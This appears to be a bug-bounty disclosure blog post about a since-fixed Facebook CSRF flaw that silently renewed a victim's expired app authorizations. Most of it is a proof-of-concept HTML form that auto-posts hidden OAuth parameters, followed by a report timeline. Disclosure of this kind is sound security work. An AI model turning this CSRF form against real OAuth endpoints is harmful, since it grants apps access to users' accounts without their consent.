Thursday, December 16, 2021

Facebook Bug POC - CSRF renew access to Apps

It was possible for an attacker to renew access to Apps

which have expired for the victim without the victim's consent.

POC -

=========================================================================

=========================================================================

<html>

<!-- POC-->

<body>

<script>history.pushState('', '', '/')</script>

<form action="https://www.facebook.com/v2.3/dialog/oauth">

<input type="hidden" name="app&#95;id" value="APP_ID" />

<input type="hidden" name="auth&#95;type" value="" />

<input type="hidden" name="cbt" value="1622970398155" />

<input type="hidden" name="channel&#95;url" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f11c70b8d77d13&amp;domain&#61;www&#46;APP_CALLBACK_DOMAIN&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;APP_CALLBACK_DOMAIN&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener" />

<input type="hidden" name="client&#95;id" value="APP_ID" />

<input type="hidden" name="display" value="popup" />

<input type="hidden" name="domain" value="www&#46;APP_CALLBACK_DOMAIN&#46;com" />

<input type="hidden" name="e2e" value="&#123;&#125;" />

<input type="hidden" name="fallback&#95;redirect&#95;uri" value="https&#58;&#47;&#47;www&#46;APP_CALLBACK_DOMAIN&#46;com&#47;signup&#63;redirect&#61;&#47;" />

<input type="hidden" name="fx&#95;app" value="facebook" />

<input type="hidden" name="locale" value="en&#95;US" />

<input type="hidden" name="logger&#95;id" value="f256cfb96281ce4" />

<input type="hidden" name="origin" value="1" />

<input type="hidden" name="redirect&#95;uri" value="https&#58;&#47;&#47;staticxx&#46;facebook&#46;com&#47;x&#47;connect&#47;xd&#95;arbiter&#47;&#63;version&#61;46&#35;cb&#61;f232d7fd018cdac&amp;domain&#61;www&#46;APP_CALLBACK_DOMAIN&#46;com&amp;origin&#61;https&#37;3A&#37;2F&#37;2Fwww&#46;APP_CALLBACK_DOMAIN&#46;com&#37;2Ff1e7baa12b0f5a4&amp;relation&#61;opener&amp;frame&#61;f3505dbd2db68" />

<input type="hidden" name="response&#95;type" value="token&#44;signed&#95;request&#44;graph&#95;domain" />

<input type="hidden" name="return&#95;scopes" value="false" />

<input type="hidden" name="scope" value="public&#95;profile&#44;email" />

<input type="hidden" name="sdk" value="joey" />

<input type="hidden" name="version" value="v2&#46;3" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

=========================================================================

=========================================================================

There will be several redirects, the last redirect will go to to a page saying "Please close this tab."

This would have not worked for Apps which have added extra permissions after victims authentication.

Timeline -

Reported -  6 June 2021
Reproduced - 14 June 2021
Triaged - 18 June 2021
Rewarded - 8 September 2021
Fixed - 30 November 2021